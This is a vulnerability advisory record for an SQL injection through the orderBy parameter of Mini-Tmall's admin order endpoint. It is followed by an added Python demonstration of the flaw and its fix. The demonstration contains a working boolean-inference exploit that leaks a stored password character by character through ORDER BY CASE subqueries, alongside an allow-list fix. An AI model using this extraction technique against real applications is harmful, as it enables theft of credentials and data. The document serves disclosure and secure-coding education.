Title | Mini-Tmall 2024.09.01 SQL Injection |
---|
Description | # Description of the vulnerability
Mini-Tmall is a small Tmall-style shopping mall built on Spring Boot. It can be deployed and run quickly and is suitable as a template project.
In Mini-Tmall v2024.09.01 and earlier, the `orderBy` parameter of the endpoint `tmall/admin/order/1/1?orderBy=1` is used to build an SQL statement without any validation of the externally supplied value, so an attacker can execute arbitrary SQL through it and read sensitive data from the database.
# System situation
## Version
Releases before September 1, 2024 (up to and including v2024.09.01)
## Project address
[https://gitee.com/project_team/Tmall_demo](https://gitee.com/project_team/Tmall_demo)
## Affected parameter
orderBy
Further details are linked below:
https://gitee.com/A0kooo/cve_article/blob/master/Mini-Tmall/Tmall_demo%20OrderController.java%20SQL%20Injection.md |
---|
Source | https://gitee.com/A0kooo/cve_article/blob/master/Mini-Tmall/Tmall_demo%20OrderController.java%20SQL%20Injection.md |
---|
User | 0kooo (UID 73212) |
---|
Submission | 09/01/2024 09:20 AM |
---|
Moderation | 09/07/2024 08:25 AM (6 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 276798 [Mini-Tmall up to 20240901 tmall/admin/order/1/1 rewardMapper.select orderBy sql injection] |
---|
Points | 20 |
---|
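The submission describes an injection through an `ORDER BY` parameter. The following is an added, constructed example (not Mini-Tmall's code, and not taken from the linked write-up) showing why this bug class is exploitable even when the attacker cannot stack statements, and how it is fixed. `ORDER BY` cannot take a bind variable for the column name, so a sort-key that is substituted into the SQL text can be replaced with a `CASE` expression whose result depends on a subquery: the order in which rows come back then leaks one bit about the database per request, which is enough to read a value character by character. The schema, table names, the `ALLOWED_ORDER_COLUMNS` mapping and the `select_orders_*` functions are all hypothetical; only the pattern (unchecked `orderBy` substitution versus an allow-list lookup) reflects the advisory. Python with the standard-library `sqlite3` module is used so the example runs offline.

```python
import sqlite3
import string

# Hypothetical allow-list: the client sends a short key, the server picks the column.
# Nothing from the request ever reaches the SQL text.
ALLOWED_ORDER_COLUMNS = {"1": "id", "2": "total", "3": "created_at"}


def setup_db():
    """Constructed in-memory schema standing in for an orders table plus a
    table the attacker should not be able to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE orders (id INTEGER PRIMARY KEY, total INTEGER, created_at TEXT);
        CREATE TABLE admin_user (id INTEGER PRIMARY KEY, password TEXT);
        INSERT INTO orders VALUES (1, 300, '2024-08-01'),
                                  (2, 100, '2024-08-02'),
                                  (3, 200, '2024-08-03');
        INSERT INTO admin_user VALUES (1, 'secret');
        """
    )
    return conn


def select_orders_vulnerable(conn, order_by):
    """Vulnerable pattern: the orderBy value is pasted into the statement.
    Returns the order ids in the sequence the database produced them."""
    sql = f"SELECT id, total FROM orders ORDER BY {order_by}"
    return [row[0] for row in conn.execute(sql)]


def select_orders_safe(conn, order_by):
    """Hardened pattern: map the request value through an allow-list and
    reject anything else. Only a server-controlled identifier reaches SQL."""
    column = ALLOWED_ORDER_COLUMNS.get(order_by)
    if column is None:
        raise ValueError(f"rejected orderBy value: {order_by!r}")
    sql = f"SELECT id, total FROM orders ORDER BY {column}"
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(condition):
    """Boolean-inference sort key: if `condition` is true the rows are sorted
    by `total`, otherwise by `id`. No statement stacking is needed."""
    return f"(CASE WHEN ({condition}) THEN total ELSE id END)"


def extract_password(conn, max_len=32):
    """Recover admin_user.password one character at a time by observing the
    row order returned by the vulnerable query. Alphabet limited to lowercase
    letters to keep the constructed example short."""
    baseline = select_orders_vulnerable(conn, "id")  # order with condition false
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in string.ascii_lowercase:
            cond = (
                f"(SELECT substr(password, {pos}, 1) FROM admin_user WHERE id = 1) = '{c}'"
            )
            if select_orders_vulnerable(conn, oracle_payload(cond)) != baseline:
                recovered += c
                break
        else:
            # No letter matched at this position: end of the value (or a
            # character outside the test alphabet).
            return recovered
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("ORDER BY 1 (column position):", select_orders_vulnerable(db, "1"))
    print("Leaked via row order:", extract_password(db))
    try:
        select_orders_safe(db, oracle_payload("1=1"))
    except ValueError as exc:
        print("Hardened query:", exc)
```

The practical check for an advisory like this one is the same as in `extract_password`: request the endpoint twice with sort keys whose only difference is a condition that is known to be true versus known to be false, and compare the order of the returned rows. The fix is not to escape or filter the parameter but to stop it from reaching the SQL text at all, as `select_orders_safe` does.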